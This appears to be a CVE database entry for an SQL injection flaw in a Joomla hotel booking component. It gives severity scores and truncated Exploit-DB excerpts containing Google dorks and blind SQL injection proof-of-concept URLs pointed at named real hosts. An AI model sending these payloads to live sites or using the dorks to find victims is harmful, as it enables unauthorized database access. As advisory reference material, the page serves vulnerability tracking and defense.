CVE-2008-5864
Published 2009-01-06
Priority P3 | 44 | high | 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.01% (78.4th percentile)
SQL injection vulnerability in the Top Hotel (com_tophotelmodule) component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlahbs | com_tophotelmodule | — | — |
| joomlahbs | hotel_booking_reservation_system | — | — |
No detection rules found.
Exploit-DB
Joomla! Component 5starhotels - SQL Injection
exploitdb·2008-12-24
CVE-2008-5875 Joomla! Component 5starhotels - SQL Injection
---
#!/usr/bin/perl -w
#Joomla com_5starhotels Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous
#[!] Module_Name: com_5starhotels
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_5starhotels"
########################################
system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Turkish Securtiy Team |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";
print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\
Exploit-DB
Joomla! Component com_lowcosthotels - Blind SQL Injection
exploitdb·2008-12-23
CVE-2008-5875 Joomla! Component com_lowcosthotels - Blind SQL Injection
---
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.joomlahbs.com/
DorK : inurl:index.php?option=com_lowcosthotels
Demo :
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
or
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@
Exploit-DB
Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
exploitdb·2008-12-21
CVE-2008-5865 Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
---
#############################################################
Joomla Component com_tophotelmodule(id) Blind SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Top Hotel Module
#[!] 06/07/2008
#[!] Joomla HBS
#[!] [email protected]
#[!] http://joomlahbs.com
#[!] 1.0.0
###################################################
Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p2/index.php?option
Exploit-DB
Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
exploitdb·2008-12-21
CVE-2008-5865 Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
---
#############################################################
Joomla Component com_hbssearch(r_type) Blind SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Joomla HBS
#[!] Administrator
#[!] [email protected]
#[!] http://joomlahbs.com
#[!] 1.0.0
###################################################
Example:
http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhote
No writeups or analysis indexed.
http://securityreason.com/securityalert/4871
http://www.securityfocus.com/bid/32952
https://exchange.xforce.ibmcloud.com/vulnerabilities/47540
https://www.exploit-db.com/exploits/7539